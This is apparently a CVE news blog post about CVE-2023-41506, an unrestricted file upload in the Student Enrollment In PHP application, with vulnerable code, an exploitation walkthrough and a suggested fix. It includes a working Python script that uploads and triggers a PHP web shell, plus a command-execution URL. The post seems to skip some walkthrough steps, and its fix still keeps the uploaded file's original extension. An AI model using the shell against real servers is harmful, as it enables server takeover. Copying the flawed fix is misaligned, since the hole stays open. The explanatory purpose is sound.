CVE CyberSecurity Database News

CVE-2023-41506 - Exploiting Arbitrary File Upload in Student Enrollment In PHP v1.

Poster -

CVE-2023-41506 is a dangerous security vulnerability discovered in the "Student Enrollment In PHP v1." web application. It allows an attacker to upload any file, including malicious PHP code, by exploiting the Edit Profile Picture functionality. This makes it easy for attackers to get full control of the server. Here, we break down how this vulnerability works, show code snippets, and give you clear guidance to understand and prevent it.

What is Student Enrollment In PHP?

Student Enrollment In PHP is a free software project that helps schools manage student registrations and records online. It uses PHP and MySQL, and is open-source, which means anyone can download, install, and modify it.

The Vulnerability Explained

The vulnerability comes from poor validation in the file upload feature when updating or editing a student's profile picture. Basically, the application does not check if the uploaded file is really an image. An attacker can upload a .php file disguised as an image, and then run their code on the server.

The Problematic Code

Let’s look at a simplified version of the code that handles file uploads (based on inspection and real-world reports):

if(isset($_FILES['profile_pic'])){
    $file_name = $_FILES['profile_pic']['name'];
    $file_tmp = $_FILES['profile_pic']['tmp_name'];

    // No extension or MIME type check!
    move_uploaded_file($file_tmp, "uploads/" . $file_name);
    // Save file path to database, or use in the system
}

Execute Your Code on the Server

Open a web browser and go to http://victim-site/uploads/shell.php?cmd=whoami

(This run the whoami command on the server.)

You now control the server! Attackers can upload more dangerous scripts, access files, or take over the whole site.

Here’s a simple example using Python’s requests library

import requests

url = 'http://target-site.com/edit_student.php?id=1';  # Adjust as needed
upload_url = 'http://target-site.com/uploads/shell.php';

files = {
    'profile_pic': ("shell.php", "<?php system($_GET['cmd']); ?>", 'application/x-php')
}

# Log in or set proper session if required
session = requests.Session()
session.post(url, files=files) # This may need the right POST format

# Trigger the shell
r = session.get(upload_url + "?cmd=whoami")
print(r.text)

Mitigation and Fix

How to fix it?

Update your upload script to filter only images. Here’s what you should add

$allowed_types = ['image/jpeg', 'image/png', 'image/gif'];
$file_type = mime_content_type($_FILES['profile_pic']['tmp_name']);

if (!in_array($file_type, $allowed_types)) {
    die('Invalid file type!');
}

// Always rename uploaded files
$file_ext = pathinfo($_FILES['profile_pic']['name'], PATHINFO_EXTENSION);
$new_name = uniqid() . '.' . $file_ext;

move_uploaded_file($_FILES['profile_pic']['tmp_name'], "uploads/" . $new_name);

References and Further Reading

- Original Source Project
- Security Advisory
- OWASP Unrestricted File Upload
- TryHackMe’s File Upload Lab

Conclusion

CVE-2023-41506 is a classic example of why file upload features must never be trusted. Always assume users will try to break your system. If you’re a developer or administrator using or maintaining Student Enrollment In PHP or similar software, update your upload code immediately to avoid being hacked.

Stay secure! If you discover a flaw, report it to the vendor and always test your site for these common vulnerabilities.

Timeline

Published on: 02/27/2024 02:15:06 UTC
Last modified on: 08/27/2024 20:35:01 UTC